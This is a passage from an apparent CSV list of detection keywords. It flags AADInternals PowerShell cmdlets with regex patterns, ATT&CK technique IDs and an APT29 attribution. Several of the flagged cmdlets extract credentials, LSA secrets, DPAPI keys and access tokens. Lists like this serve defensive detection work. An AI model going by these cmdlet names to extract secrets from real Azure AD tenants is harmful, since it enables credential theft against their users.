tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureVMs*",".{0,1000}Get\-AADIntAzureVMs.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - 
T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntAzureWireServerAddress*",".{0,1000}Get\-AADIntAzureWireServerAddress.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntB2CEncryptionKeys*",".{0,1000}Get\-AADIntB2CEncryptionKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntCache*",".{0,1000}Get\-AADIntCache.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntCertificate*",".{0,1000}Get\-AADIntCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 
- T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntCompanyInformation*",".{0,1000}Get\-AADIntCompanyInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntCompanyInformation.*",".{0,1000}Get\-AADIntCompanyInformation\..{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntCompanyTags*",".{0,1000}Get\-AADIntCompanyTags.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntComplianceAPICookies*",".{0,1000}Get\-AADIntComplianceAPICookies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntConditionalAccessPolicies*",".{0,1000}Get\-AADIntConditionalAccessPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDesktopSSOAccountPassword*",".{0,1000}Get\-AADIntDesktopSSOAccountPassword.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDeviceCompliance*",".{0,1000}Get\-AADIntDeviceCompliance.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDeviceRegAuthMethods*",".{0,1000}Get\-AADIntDeviceRegAuthMethods.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDevices*",".{0,1000}Get\-AADIntDevices.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDeviceTransportKey*",".{0,1000}Get\-AADIntDeviceTransportKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDiagnosticSettingsDetails*",".{0,1000}Get\-AADIntDiagnosticSettingsDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 
- T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntDPAPIKeys*",".{0,1000}Get\-AADIntDPAPIKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntEASAutoDiscover*",".{0,1000}Get\-AADIntEASAutoDiscover.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntEASAutoDiscoverV1*",".{0,1000}Get\-AADIntEASAutoDiscoverV1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntEASOptions*",".{0,1000}Get\-AADIntEASOptions.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for 
administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntEndpointInstances*",".{0,1000}Get\-AADIntEndpointInstances.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntEndpointIps*",".{0,1000}Get\-AADIntEndpointIps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntError*",".{0,1000}Get\-AADIntError.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntFOCIClientIDs*",".{0,1000}Get\-AADIntFOCIClientIDs.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntGlobalAdmins*",".{0,1000}Get\-AADIntGlobalAdmins.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServiceAccessToken*",".{0,1000}Get\-AADIntHybridHealthServiceAccessToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServiceAgentInfo*",".{0,1000}Get\-AADIntHybridHealthServiceAgentInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - 
TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServiceBlobUploadKey*",".{0,1000}Get\-AADIntHybridHealthServiceBlobUploadKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServiceEventHubPublisherKey*",".{0,1000}Get\-AADIntHybridHealthServiceEventHubPublisherKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServiceMemberCredentials*",".{0,1000}Get\-AADIntHybridHealthServiceMemberCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntHybridHealthServiceMembers*",".{0,1000}Get\-AADIntHybridHealthServiceMembers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServiceMonitoringPolicies*",".{0,1000}Get\-AADIntHybridHealthServiceMonitoringPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntHybridHealthServices*",".{0,1000}Get\-AADIntHybridHealthServices.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntIdentityTokenByLiveId*",".{0,1000}Get\-AADIntIdentityTokenByLiveId.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntImmutableID*",".{0,1000}Get\-AADIntImmutableID.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntKerberosDomainSyncConfig*",".{0,1000}Get\-AADIntKerberosDomainSyncConfig.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntKerberosTicket*",".{0,1000}Get\-AADIntKerberosTicket.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntLocalDeviceJoinInfo*",".{0,1000}Get\-AADIntLocalDeviceJoinInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - 
T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntLocalUserCredentials*",".{0,1000}Get\-AADIntLocalUserCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntLoginInformation*",".{0,1000}Get\-AADIntLoginInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntLSABackupKeys*",".{0,1000}Get\-AADIntLSABackupKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntLSASecrets*",".{0,1000}Get\-AADIntLSASecrets.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell 
module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMobileDevices*",".{0,1000}Get\-AADIntMobileDevices.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMSPartnerContracts*",".{0,1000}Get\-AADIntMSPartnerContracts.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMSPartnerOffers*",".{0,1000}Get\-AADIntMSPartnerOffers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Get-AADIntMSPartnerOrganizations*",".{0,1000}Get\-AADIntMSPartnerOrganizations.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMSPartnerPublishers*",".{0,1000}Get\-AADIntMSPartnerPublishers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMSPartnerRoleMembers*",".{0,1000}Get\-AADIntMSPartnerRoleMembers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMSPartners*",".{0,1000}Get\-AADIntMSPartners.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntMyTeams*",".{0,1000}Get\-AADIntMyTeams.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntOAuthGrants*",".{0,1000}Get\-AADIntOAuthGrants.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntODAuthenticationCookie*",".{0,1000}Get\-AADIntODAuthenticationCookie.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Get-AADIntOfficeUpdateBranch*",".{0,1000}Get\-AADIntOfficeUpdateBranch.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 